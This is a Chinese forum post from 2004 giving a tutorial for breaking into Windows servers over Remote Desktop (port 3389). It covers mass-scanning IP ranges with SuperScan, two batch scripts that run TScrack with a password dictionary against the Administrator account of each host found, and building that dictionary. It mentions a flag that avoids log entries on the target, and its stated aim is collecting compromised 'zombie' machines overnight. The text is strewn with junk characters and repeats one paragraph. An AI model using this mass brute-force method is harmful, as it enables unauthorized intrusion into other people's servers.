数学建模社区-数学中国

标题: 终端服务真正的另类入侵 [打印本页]
作者: 韩冰    时间: 2004-10-6 09:51
标题: 终端服务真正的另类入侵

作者:霜风 QQ:14226581

8 y/ R4 K+ M: q/ ?

终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。 ( [( Z! ]* a4 e2 |5 c# ~8 w/ X- U这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: ; z/ b' }. c% i* X+ c ?- K# G首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下: 4 a) j! Z# c) O% H. Y# U& I先打开superscan3如图1 $ n! N! j6 H/ P# \; x( q+ x& z2 @4 E+ o2 E; f6 C 此主题相关图片如下:! B m4 z8 N# o3 ]/ a

' F+ q$ H. s. I& g) B5 n

% Q5 N# {/ U0 N: n0 G. H1 W接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2 ! ?" B4 e, R1 Y" f8 K" Y% t$ l& v - B: W1 D7 v* P+ W/ @ A( [此主题相关图片如下:) g8 R( E" }- @& k' Y9 P - G# N+ h6 w$ Y4 L% I

9 u6 p6 C. |* \2 Q6 o0 \

然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除. 4 J% W7 c8 J- @2 P/ E1 t" e这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图31 \: w* R- t R* [# r3 G 2 q( S$ p8 G v' U2 V8 Z 此主题相关图片如下:6 ]5 t# Q6 T5 Q8 {: n3 c& k9 y$ e

8 u+ `7 n9 r$ ?$ V0 d) a% N

1 P r- c/ O& h; ]7 K8 E“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。 4 i! Y* T' a( b9 A# u6 s' L. Y! s4 Y3 m- z+ B# H 此主题相关图片如下:8 @7 B3 w5 Z& c

' g6 v2 f! D7 k; O, S' [

接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5( G; L+ [: c) o+ G, y" g; o 1 H$ \( m+ d' \! n. h: D, c4 y此主题相关图片如下: A- f% `' f7 U6 m. H$ | ]: m

& T$ E2 u1 h D g; n

进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。8 L7 Y+ V" o2 n9 ~0 A 所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。 & s5 i3 g7 v2 u. KTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。 ( h* \2 j! J0 p; l9 _7 f2 w此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。 7 P4 e7 F6 Z0 \! N& c# C在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:6 ~3 U3 K2 F, y9 M( M$ { -h : Print usage help and exit' B5 j+ U4 u! ?0 w3 s2 j" s; }( u) T -V : Print version info and exit% b8 p. p5 Q% U0 ~3 m/ A5 Q5 } -s : Print chipher strenght info and exit% V. L- P$ K' R, ^# t -b : Enable failed password beep: C7 F6 C: @; I$ @ -t : Use two simultaneous connections [EXPERIMENTAL] ; Y* F, _4 a/ x- J/ a-N : Prevent System Log entries on targeted server+ X1 O) A9 c9 a* ^ -U : Uninstall tscrack and remove components( I( j, _; @6 w; m( t' A0 \ -f <number> : Wordlist entry to start cracking with, a5 T. Q" y; {; T -F <delay> : Sampling Frequency (Delay between samples in ms)7 J! W. z/ I/ b& }- r y: S+ ~4 ~ -l <user> : Account name to use, defaults to Administrator' h; S( Y: `+ Q( d$ f -w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted1 ~" c# P" \, X# o5 I -p <password> : Use <password> to logon instead of wordlist/blank pass / h7 P( ?# F3 p) `8 x! f-D <domain> : Specify domain to attempt logon to

) G) |; v3 v0 g$ x D9 U ) S/ b7 V4 l. x) A0 A5 r6 o8 A. M 我就帮忙翻译一下吧,翻译得不好可不要怪我啊: + \* Y) T8 A% s/ ?5 n! F: D-h : 显示使用帮助然后退出 F$ d, T, v0 X, R- e1 M -V : 显示版本信息然后退出 6 Q0 f' D/ z7 ?/ f1 f-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)" j. j0 d0 d* s* Q1 y; o! W -b : 密码错误时发出声音 5 W" L/ m. P- g& G7 r-t : 同时发出多个连接,就是多线程。 ' L6 q L7 \) F; R. x-N : Prevent System Log entries on targeted server: A8 q) c; v: d+ q; H- E! \/ g -U : 卸载移除tscrack组件。3 S$ o: X. u. `+ G2 I; a -f <number> : 使用-F后面的密码。 ! }1 s/ o w' ]% f-F <delay> : 间隔时间(频率) ( V9 d3 \) N4 p4 X) O, ?-l <user> : 使用-L后面的用户名 , ]& c4 S! K% g1 w/ g4 s-w <wordlist> : 使用-W后面的字典; S9 w6 f+ i' z8 D -p <password> : 使用-W后的密码1 A5 I* I5 r% C, f, R, b- A2 t -D <domain> : 登陆主页面?

: [9 u7 e5 i* H8 I j, K 相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本: 7 }( X0 N1 H' H9 s( }0 {@if not exist IpcScan.txt goto noscan- _+ \* {: C7 C! B! z* d/ y) D0 W8 ` @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i, l5 @, b0 E) t* \ :noscan ( k- Y8 S9 |- U' H& W; ` R@echo 3389.txt no find or scan faild

# v! v5 S) |$ L7 n+ E 这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)

& n2 D1 [! d6 b保存后把后错名改为BAT就可以了。+ S. E4 {- [& n+ C/ k# l# D( Q- s 还写一个BAT,名字为HACK.BAT,代码如下:

+ F1 c8 H5 D& Y) d@if not exist tscrack.exe goto noscan& C1 y" \! t+ j& c) k( t2 ` @tscrack %1 -l administartor -w pass.dic >>rouji.txt; Z; h# n1 ?0 F. d. J1 t4 U" X :noscan / h& O7 p- N/ G- M! r5 R@echo tscrack.exe no find or scan faild

) q: C: x( n$ V1 F9 O3 P 这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC # u# e3 v& k# g5 F制作方法如上。/ J) M6 K2 N! N1 d& Q, {$ X6 k 然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6 3 v! W6 e b( P8 q1 H: h% K ' d4 N/ _) j/ J: U此主题相关图片如下:. e/ I" o+ t& [! y

怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. z. H5 B3 b' Z最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7 . X) l$ Z6 @& G( k+ [ ( a! P; w& U# M2 U此主题相关图片如下:- a' S* X) I6 K! b* A & i* e; K/ j( O- p 怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. ; J& n Q2 _7 [最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~



欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5